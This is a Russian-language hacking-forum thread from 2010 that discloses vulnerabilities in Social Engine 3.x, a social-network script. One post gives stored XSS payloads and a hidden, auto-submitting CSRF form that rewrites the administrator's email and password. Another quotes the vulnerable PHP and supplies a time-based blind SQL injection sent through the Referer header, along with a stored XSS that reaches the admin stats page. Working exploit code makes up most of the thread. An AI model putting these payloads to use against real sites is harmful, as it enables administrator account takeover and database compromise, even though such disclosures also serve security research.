Старый 09.07.2010, 12:23   #1
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию Уязвимости Social Engine

Social Engine v 3.18
Скрипт для создание социальных сетей (Привет вконтакти)
Активная XSS:
/profile.php?user=victim
Переходим на вкладку Comments.
Цитата:
<a href='javascript:alert();'>xek</a>
Цитата:
<IMG src="javascript:alert()"></img>
Активная XSS:
/user_editprofile_style.php
Цитата:
body{
background-image: url('javascript:alert()');
}
CSRF:
Код HTML:
<div style='display:none'>
<form action='http://localhost/se/admin/admin_viewusers_edit.php' method='post' name='xeker'>
<input type='text' class='text' name='user_email' value='milo@mail.com' size='30' maxlength='70'>
<input type='text' class='text' name='user_username' value='Ctacok' size='30' maxlength='50'>
<input type='password' class='text' name='user_password' value='' size='30' maxlength='50'>
<select class='text' name='user_enabled'><option value='0'>Disabled</option>
<select class='text' name='user_level_id'><option value='1' SELECTED>Default Level</option>
<select class='text' name='user_profilecat_id'><option value='1' SELECTED>Standard Users</option>
<input type='text' class='text' name='user_invitesleft' value='5' maxlength='3' size='2'>
<input type='submit' class='button' value='Save Changes'>
<input type='hidden' name='task' value='edituser'>
<input type='hidden' name='user_id' value='1'>
<input type='hidden' name='s' value='id'>
<input type='hidden' name='p' value='1'>
<input type='hidden' name='f_user' value=''>
<input type='hidden' name='f_email' value=''><input type='hidden' name='f_level' value=''>
<input type='hidden' name='f_subnet' value=''>
<input type='hidden' name='f_enabled' value=''>
</form>
</div>

<script language="JavaScript" type="text/javascript"> 
document.xeker.submit(); 
</script>
Ну и пару скулей в админке.
__________________
Twitter - @Ctacok

Последний раз редактировалось (dm); 19.08.2010 в 02:41.. Причина: изменение заголовка
Ctacok вне форума   Ответить с цитированием
Старый 10.07.2010, 22:03   #2
S00pY
 
Аватар для S00pY
 
Регистрация: 06.07.2010
Сообщений: 38
Репутация: 35
Arrow Social Engine 3.*

Social Engine
site:h**p://socialengine.net

Time based blind MySQL injection

Уязвимые версии:
Цитата:
3.16(Social Engine 3.16 - Nulled By Trioxx & Satisfactory)
3.18(SocialEngine 3.18 NULLED)
3.20(SocialEngine 3.20 NULLED)
/*Похоже что уязвимы все версии 3ей ветки*/

Зависимости:


Путь до файла:
Цитата:
files/include/functions_stats.php
PHP код:
<?php 

/*------*/

// THIS FUNCTION GETS THE CURRENT VIEWER'S REFERRING URL AND ADDS IT TO REF URL STATS TABLE
// INPUT:
// OUTPUT: 
function update_refurls()
{
    global 
$database;

    
// IF URL IS NOT EMPTY
    
$referring_url $_SERVER["HTTP_REFERER"];
    if(
strpos(strtolower($referring_url), strtolower($_SERVER["HTTP_HOST"])) !== FALSE) { return; }

    if( 
$referring_url )
  {
      
// IS URL ALREADY IN DATABASE? IF YES, ADD TO HITS. IF NO, ADD NEW ROW
      
$referring_url str_replace("http://www.""http://"$referring_url);
      
$database->database_query("
      INSERT INTO se_statrefs
        (statref_hits, statref_url)
      VALUES
        ('1', '
{$referring_url}')
            ON DUPLICATE KEY UPDATE
        statref_hits=statref_hits+1
    "
);
    
      
// IF 1000 ROWS REACHED, DELETE ONE TO MAKE ROOM
      
$refurl_totalrows $database->database_num_rows($database->database_query("SELECT statref_id FROM se_statrefs"));
    
      if( 
$refurl_totalrows 1000 )
      
$database->database_query("DELETE FROM se_statrefs WHERE statref_hits='1' ORDER BY statref_id ASC LIMIT 1");
    }
}
// END update_refurls FUNCTION
?>
Цитата:
Уязвимая функция вызывается в /home.php
Эксплоит:
Цитата:
http://target/home.php ->
HTTP_REFERER = http://qwerty.ru
HTTP_REFERER = http://qwerty.ru') ON DUPLICATE KEY UPDATE statref_hits = (IF((version()=4),1,sleep(25)))/*

Active xss

./admin/admin_stats.php?graph=referrers



PHP код:
if($graph == "referrers") {

  
// CLEAR CHART
  
$chart "";

  
$referrers $database->database_query("SELECT * FROM se_statrefs ORDER BY statref_hits DESC LIMIT 100");
  
$referrer_array = Array();
  
$referrer_count 0;
  while(
$referrer $database->database_fetch_assoc($referrers)) {
    
$referrer_array[$referrer_count] = Array('referrer_url' => $referrer[statref_url],
                         
'referrer_hits' => $referrer[statref_hits]);
    
$referrer_count++;
  }

}

/*-------------------*/


$smarty->assign('referrers'$referrer_array); 
Данные берутся из таблицы se_statrefs


Эксплоит:
Цитата:
http://target/home.php ->
HTTP_REFERER = <xss>
S00pY вне форума   Ответить с цитированием
Ответ

Метки
social engine, xss

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot